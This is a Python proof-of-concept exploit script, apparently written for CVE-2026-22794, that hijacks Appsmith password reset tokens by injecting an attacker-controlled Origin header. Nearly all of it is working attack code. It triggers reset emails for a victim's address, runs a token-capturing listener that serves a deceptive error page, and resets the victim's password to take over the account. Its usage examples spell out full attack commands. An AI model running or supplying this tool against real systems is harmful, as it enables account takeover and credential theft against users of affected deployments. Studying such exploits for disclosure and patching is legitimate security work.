#!/usr/bin/env python3 """ CVE-2026-22794 - Appsmith Origin Header Injection PoC ====================================================== Vulnerability: Password Reset Link Hijacking via Origin Header Manipulation Affected Software: Appsmith (versions prior to patch) Severity: Critical (CVSS 9.1) Impact: Full Account Takeover Description: Appsmith uses the HTTP Origin header without validation to construct password reset and email verification URLs. An attacker can inject a malicious Origin header to redirect password reset tokens to an attacker-controlled server, resulting in full account takeover. Author: Security Researcher Disclaimer: This tool is for authorized security testing only. Unauthorized access to computer systems is illegal. """ import argparse import requests import threading import socket import sys import time import urllib.parse from http.server import HTTPServer, BaseHTTPRequestHandler from datetime import datetime from colorama import Fore, Style, init # Initialize colorama for cross-platform colored output init(autoreset=True) # Fix Windows console encoding import io sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8', errors='replace') sys.stderr = io.TextIOWrapper(sys.stderr.buffer, encoding='utf-8', errors='replace') # Banner (ASCII-safe for Windows compatibility) BANNER = f""" {Fore.RED}+===================================================================+ | CVE-2026-22794 EXPLOIT | | Appsmith Origin Header Injection PoC | | Password Reset Token Hijack | +===================================================================+{Style.RESET_ALL} {Fore.YELLOW}[!] DISCLAIMER: For authorized security testing only!{Style.RESET_ALL} {Fore.YELLOW}[!] Unauthorized access to computer systems is illegal.{Style.RESET_ALL} """ # Global storage for captured tokens captured_tokens = [] class TokenCaptureHandler(BaseHTTPRequestHandler): """HTTP Handler to capture password reset tokens.""" def log_message(self, format, *args): """Custom logging to show captured requests.""" timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S") print(f"{Fore.GREEN}[{timestamp}] {Fore.CYAN}Request: {args[0]}{Style.RESET_ALL}") def do_GET(self): """Handle GET requests - capture reset tokens.""" global captured_tokens parsed_path = urllib.parse.urlparse(self.path) query_params = urllib.parse.parse_qs(parsed_path.query) print(f"\n{Fore.GREEN}{'='*60}") print(f"{Fore.RED}[+] INCOMING REQUEST CAPTURED!{Style.RESET_ALL}") print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}") print(f"{Fore.YELLOW}[*] Path: {Fore.WHITE}{self.path}{Style.RESET_ALL}") print(f"{Fore.YELLOW}[*] Client: {Fore.WHITE}{self.client_address[0]}:{self.client_address[1]}{Style.RESET_ALL}") # Check for reset token if 'token' in query_params: token = query_params['token'][0] captured_tokens.append({ 'token': token, 'timestamp': datetime.now().isoformat(), 'path': self.path, 'client_ip': self.client_address[0] }) print(f"\n{Fore.RED}[!!!] PASSWORD RESET TOKEN CAPTURED!{Style.RESET_ALL}") print(f"{Fore.RED}[!!!] Token: {Fore.WHITE}{token}{Style.RESET_ALL}") print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}\n") # Save token to file with open('captured_tokens.txt', 'a') as f: f.write(f"{datetime.now().isoformat()} | {token} | {self.client_address[0]}\n") # Send a convincing phishing page self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() # Fake "server error" page to avoid suspicion response = """
The server is temporarily unable to service your request. Please try again later.
""" self.wfile.write(response.encode()) def do_POST(self): """Handle POST requests.""" content_length = int(self.headers.get('Content-Length', 0)) post_data = self.requestline.read(content_length) if content_length else b'' print(f"\n{Fore.YELLOW}[*] POST Data Received: {post_data.decode()}{Style.RESET_ALL}") self.send_response(200) self.send_header('Content-type', 'application/json') self.end_headers() self.wfile.write(b'{"status": "ok"}') def start_capture_server(port: int, host: str = "0.0.0.0"): """Start the token capture HTTP server.""" server = HTTPServer((host, port), TokenCaptureHandler) print(f"{Fore.GREEN}[+] Token capture server started on {host}:{port}{Style.RESET_ALL}") print(f"{Fore.YELLOW}[*] Waiting for victim to click the malicious reset link...{Style.RESET_ALL}\n") server.serve_forever() def send_malicious_reset_request( target_url: str, victim_email: str, attacker_origin: str, timeout: int = 30 ) -> dict: """ Send a password reset request with a malicious Origin header. Args: target_url: The Appsmith target URL (e.g., https://appsmith.target.com) victim_email: The victim's email address attacker_origin: The attacker's server URL to receive the token timeout: Request timeout in seconds Returns: dict: Result containing success status and response details """ # Construct the API endpoint api_endpoint = f"{target_url.rstrip('/')}/api/v1/users/forgotPassword" # Malicious headers with attacker-controlled Origin headers = { 'Content-Type': 'application/json', 'Origin': attacker_origin, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en;q=0.9', 'Referer': f"{target_url}/user/forgotPassword", } # Request payload payload = { 'email': victim_email } print(f"\n{Fore.CYAN}[*] Sending malicious password reset request...{Style.RESET_ALL}") print(f"{Fore.YELLOW}[*] Target: {Fore.WHITE}{api_endpoint}{Style.RESET_ALL}") print(f"{Fore.YELLOW}[*] Victim Email: {Fore.WHITE}{victim_email}{Style.RESET_ALL}") print(f"{Fore.RED}[*] Malicious Origin: {Fore.WHITE}{attacker_origin}{Style.RESET_ALL}") try: response = requests.post( api_endpoint, json=payload, headers=headers, timeout=timeout, verify=True # Set to False for self-signed certs in testing ) result = { 'success': response.status_code in [200, 201, 202], 'status_code': response.status_code, 'response': response.text, 'headers': dict(response.headers) } if result['success']: print(f"\n{Fore.GREEN}[+] SUCCESS! Password reset email triggered!{Style.RESET_ALL}") print(f"{Fore.GREEN}[+] Status Code: {response.status_code}{Style.RESET_ALL}") print(f"{Fore.YELLOW}[*] The victim will receive an email with a link pointing to:{Style.RESET_ALL}") print(f"{Fore.RED} {attacker_origin}/user/resetPassword?token=XXXXX{Style.RESET_ALL}") print(f"\n{Fore.CYAN}[*] Waiting for victim to click the link...{Style.RESET_ALL}") else: print(f"\n{Fore.RED}[-] Request failed with status code: {response.status_code}{Style.RESET_ALL}") print(f"{Fore.YELLOW}[*] Response: {response.text[:500]}{Style.RESET_ALL}") return result except requests.exceptions.Timeout: print(f"{Fore.RED}[-] Request timed out{Style.RESET_ALL}") return {'success': False, 'error': 'timeout'} except requests.exceptions.ConnectionError as e: print(f"{Fore.RED}[-] Connection error: {e}{Style.RESET_ALL}") return {'success': False, 'error': str(e)} except Exception as e: print(f"{Fore.RED}[-] Unexpected error: {e}{Style.RESET_ALL}") return {'success': False, 'error': str(e)} def reset_password_with_token( target_url: str, token: str, new_password: str, timeout: int = 30 ) -> dict: """ Complete the account takeover by resetting the password with the captured token. Args: target_url: The Appsmith target URL token: The captured password reset token new_password: The new password to set timeout: Request timeout in seconds Returns: dict: Result containing success status and response details """ api_endpoint = f"{target_url.rstrip('/')}/api/v1/users/resetPassword" headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/plain, */*', } payload = { 'token': token, 'password': new_password } print(f"\n{Fore.RED}[!] EXECUTING ACCOUNT TAKEOVER...{Style.RESET_ALL}") print(f"{Fore.YELLOW}[*] Using captured token: {token[:20]}...{Style.RESET_ALL}") try: response = requests.post( api_endpoint, json=payload, headers=headers, timeout=timeout, verify=True ) if response.status_code in [200, 201]: print(f"\n{Fore.GREEN}{'='*60}") print(f"{Fore.GREEN}[+] ACCOUNT TAKEOVER SUCCESSFUL!{Style.RESET_ALL}") print(f"{Fore.GREEN}[+] Password has been reset to: {new_password}{Style.RESET_ALL}") print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}\n") return {'success': True, 'status_code': response.status_code} else: print(f"{Fore.RED}[-] Password reset failed: {response.status_code}{Style.RESET_ALL}") return {'success': False, 'status_code': response.status_code, 'response': response.text} except Exception as e: print(f"{Fore.RED}[-] Error: {e}{Style.RESET_ALL}") return {'success': False, 'error': str(e)} def check_vulnerability(target_url: str) -> bool: """ Check if the target is potentially vulnerable to CVE-2026-22794. Args: target_url: The Appsmith target URL Returns: bool: True if potentially vulnerable, False otherwise """ print(f"\n{Fore.CYAN}[*] Checking if target is vulnerable...{Style.RESET_ALL}") try: # Try to access the forgot password endpoint check_url = f"{target_url.rstrip('/')}/api/v1/users/forgotPassword" # Send OPTIONS request to check CORS response = requests.options( check_url, headers={'Origin': 'https://evil-attacker.com'}, timeout=10 ) # Check if the endpoint exists and accepts cross-origin if response.status_code in [200, 204]: cors_header = response.headers.get('Access-Control-Allow-Origin', '') if cors_header == '*' or 'evil-attacker.com' in cors_header: print(f"{Fore.RED}[+] Target appears VULNERABLE! CORS is misconfigured.{Style.RESET_ALL}") return True # Also check if we can access the API test_response = requests.post( check_url, json={'email': 'test@test.com'}, headers={'Origin': 'https://evil-attacker.com', 'Content-Type': 'application/json'}, timeout=10 ) if test_response.status_code != 403: print(f"{Fore.YELLOW}[?] Target may be vulnerable. Manual verification recommended.{Style.RESET_ALL}") return True else: print(f"{Fore.GREEN}[-] Target appears to validate Origin header.{Style.RESET_ALL}") return False except Exception as e: print(f"{Fore.YELLOW}[?] Could not determine vulnerability status: {e}{Style.RESET_ALL}") return False def get_public_ip() -> str: """Get the public IP address of the attacker machine.""" try: response = requests.get('https://api.ipify.org', timeout=5) return response.text except: return "YOUR_PUBLIC_IP" def main(): """Main function to run the exploit.""" print(BANNER) parser = argparse.ArgumentParser( description='CVE-2026-22794 - Appsmith Origin Header Injection Exploit', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: # Start token capture server only python exploit.py --listen --port 8080 # Send malicious reset request python exploit.py --target https://appsmith.target.com --email victim@company.com --attacker-url https://attacker.com # Full automated attack python exploit.py --target https://appsmith.target.com --email victim@company.com --attacker-url https://attacker.com --listen --port 8080 # Use captured token to reset password python exploit.py --target https://appsmith.target.com --reset-token CAPTURED_TOKEN --new-password NewP@ssw0rd! # Check if target is vulnerable python exploit.py --target https://appsmith.target.com --check """ ) parser.add_argument( '-t', '--target', help='Target Appsmith URL (e.g., https://appsmith.target.com)' ) parser.add_argument( '-e', '--email', help='Victim email address' ) parser.add_argument( '-a', '--attacker-url', help='Attacker server URL to receive the token (e.g., https://attacker.com)' ) parser.add_argument( '-l', '--listen', action='store_true', help='Start HTTP server to capture tokens' ) parser.add_argument( '-p', '--port', type=int, default=8080, help='Port for token capture server (default: 8080)' ) parser.add_argument( '--host', default='0.0.0.0', help='Host to bind capture server (default: 0.0.0.0)' ) parser.add_argument( '-r', '--reset-token', help='Use a captured token to reset password' ) parser.add_argument( '-n', '--new-password', help='New password to set (used with --reset-token)' ) parser.add_argument( '-c', '--check', action='store_true', help='Check if target is vulnerable' ) parser.add_argument( '--timeout', type=int, default=30, help='Request timeout in seconds (default: 30)' ) args = parser.parse_args() # If no arguments, show help if len(sys.argv) == 1: parser.print_help() sys.exit(0) # Check vulnerability if args.check: if not args.target: print(f"{Fore.RED}[-] Please specify target URL with --target{Style.RESET_ALL}") sys.exit(1) check_vulnerability(args.target) sys.exit(0) # Reset password with token if args.reset_token: if not args.target or not args.new_password: print(f"{Fore.RED}[-] Please specify --target and --new-password{Style.RESET_ALL}") sys.exit(1) reset_password_with_token(args.target, args.reset_token, args.new_password, args.timeout) sys.exit(0) # Start the capture server in background if requested if args.listen: public_ip = get_public_ip() print(f"{Fore.CYAN}[*] Your public IP: {public_ip}{Style.RESET_ALL}") print(f"{Fore.YELLOW}[*] Make sure port {args.port} is accessible from the internet{Style.RESET_ALL}") server_thread = threading.Thread( target=start_capture_server, args=(args.port, args.host), daemon=True ) server_thread.start() time.sleep(1) # Give server time to start # Send malicious reset request if args.target and args.email and args.attacker_url: result = send_malicious_reset_request( args.target, args.email, args.attacker_url, args.timeout ) # If listening, keep the server running if args.listen and result.get('success'): print(f"\n{Fore.CYAN}[*] Server is running. Press Ctrl+C to stop.{Style.RESET_ALL}") try: while True: time.sleep(1) if captured_tokens: print(f"\n{Fore.GREEN}[+] Tokens captured so far: {len(captured_tokens)}{Style.RESET_ALL}") for t in captured_tokens: print(f" - {t['token'][:30]}... ({t['timestamp']})") except KeyboardInterrupt: print(f"\n{Fore.YELLOW}[*] Shutting down...{Style.RESET_ALL}") if captured_tokens: print(f"\n{Fore.GREEN}[+] Total tokens captured: {len(captured_tokens)}{Style.RESET_ALL}") print(f"{Fore.YELLOW}[*] Tokens saved to captured_tokens.txt{Style.RESET_ALL}") elif args.listen: # Just run the server try: while True: time.sleep(1) except KeyboardInterrupt: print(f"\n{Fore.YELLOW}[*] Shutting down...{Style.RESET_ALL}") else: parser.print_help() if __name__ == '__main__': main()